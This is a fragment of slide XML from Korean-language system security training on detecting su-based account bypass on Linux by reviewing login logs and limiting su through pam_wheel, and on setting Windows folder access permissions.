            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53E24A63-6A2A-4567-9AEC-153B392CE67B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90355532"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6281892" y="3212200"/>
          <a:ext cx="4932807" cy="736346"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1277954937"/>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user</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>_list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27777403"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4378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설정에 따라 접속 허용 목록</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(white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또는 접근 거부</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r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(black list)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지정할 수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11958"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC205F13-DB4D-47D5-980E-E30E8003099A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6281892" y="4506414"/>
            <a:ext cx="5005578" cy="564515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C16F562-66DB-47A3-ABB9-C161B92AF74F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5529725"/>
            <a:ext cx="5616792" cy="959274"/>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BDF64BA6-C2B2-4A18-BB87-B49CD588434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34A2051-289E-4A23-AE45-C548601B603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841D386-6256-4413-A7D6-79612E117A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7" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650BC3A8-2AC6-4D71-9591-46303462FC9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602759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/Training/Unit/Sys/5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>계정 우회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서버에 계정 우회 접속하여 사용 중인 사용자를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접속 로그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제한 설정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우회 접속을 탐지하고 대응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75E9CCA2-7560-45A5-8A46-ED28BB2E650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6DE843-9ABD-435E-A5FF-7D5520B785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8769AAD6-9176-402D-BFC2-B19F8F1F52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02EF713-5D02-4251-A324-8B9EADC68D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8579203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시스템 접속 로그 점검</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># tail /var/log/secure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a:t>원격에서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test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>계정 접속 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>명령으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>계정으로 전환함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용 제한</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pam.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>#auth required pam_wheel.so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>use_uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>#(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주석</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>제거</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7450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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다시 로그를 확인하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>navy123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정 접속 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 전환되지 않음을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC385B03-C822-4C67-BC17-8209D9217797}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1687" t="13865" r="713" b="3014"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="547007" y="884701"/>
            <a:ext cx="4898572" cy="2439989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF4C8086-E19B-462A-9CA8-459B472F8D3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2504809960"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="547578" y="3655169"/>
          <a:ext cx="4932807" cy="492506"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3572634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20292981"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2346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파일의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>마지막 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>개의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5252999"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="표 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{147FCA47-A7D7-4F4B-8038-69A7D2A9139E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2906829667"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="550068" y="4174175"/>
          <a:ext cx="4932807" cy="492506"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="140904347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uid=0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38276291"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2346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계정은 관리자 권한을 가진다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167500"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0045126F-08FC-4771-9D61-6F890248916B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="555" b="49604"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391729" y="720992"/>
            <a:ext cx="4760686" cy="1360902"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A28C8146-D035-4A9C-813B-6469F9779530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391729" y="2370412"/>
            <a:ext cx="4780407" cy="1117092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="표 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAC56F90-7683-44C6-8F22-DF14E7DE3B15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2026925839"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6392300" y="3599625"/>
          <a:ext cx="4932807" cy="1224026"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="344534541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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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sz="1000" b="1"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138353260"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="844296">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pP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레드햇</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기반 리눅스에서 많은 프로그램이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PAM(Pluggable Authentication Modules)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중앙 인증 메커니즘을 사용하도록 구성된다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PAM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플러그 가능한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(pluggable)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모듈러</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(modular)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아키텍처를 사용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관리자가 시스템에 대한 인증 정책을 설정할 때 유연성</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(flexibility)</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제공한다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201622"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="표 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D254592-FBE8-4AAF-A7D8-B4F597D4E1CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3922383120"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="547578" y="5376141"/>
          <a:ext cx="4932807" cy="980186"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="24322357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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>_wheel</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>.so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46236320"/>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모듈은 휠 그룹</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group)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시행하는 데 사용된다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휠 그룹에 포함된 계정에 대한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허용한다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이름의 그룹이 없으면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대상으로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5870174"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A175EE9C-5C2D-492B-B0BC-C2F0D9F2A36A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5242769"/>
            <a:ext cx="5616792" cy="124623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5" name="그룹 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E79E8A83-84C8-40CE-8A56-9A690170D4F5}"/>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18C1627A-B8F9-49C4-B95C-AFB4FA87346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F83EAF-CEC9-4FE9-87ED-66E5474C23E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6" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97710E03-9510-4373-94DC-274D82D30D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1278909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/Training/Unit/Sys/6</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일 접근 권한 설정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(Windows)</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내부 디렉토리를 특정한 사용자가 파일에 접근할 수 있도록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설정해 주는 것이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c\navy06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폴더에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설정되어 있지 않습니다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모든 권한으로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부여하시오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권한을 설정할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B46856A7-09F2-40DF-885C-124424F543E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E2B77-6BBC-4887-8AE9-21295D06F5B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E9A73D5-E882-4AF8-8AAD-360657E492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2D1034D5-D759-4AE3-8CC3-8614F2C1A9A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990498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“파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>탐색기”에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> “로컬 디스크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(C:)” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>선택</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>navy06” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>폴더 선택 후 마우스 오른쪽 클릭</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>“속성</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(R)”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“보안” 탭 선택 후 “편집</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(E)...” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>클릭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </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64658F80-D0CE-476E-891E-2E48172A17D3}"/>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57BCE0CB-E0AC-4B3C-A146-69C2B2D23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F139A0A-E62E-4F49-8BF9-D32B2AAE38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E4632BD9-AACF-4F2C-B0E5-B05C18369E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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
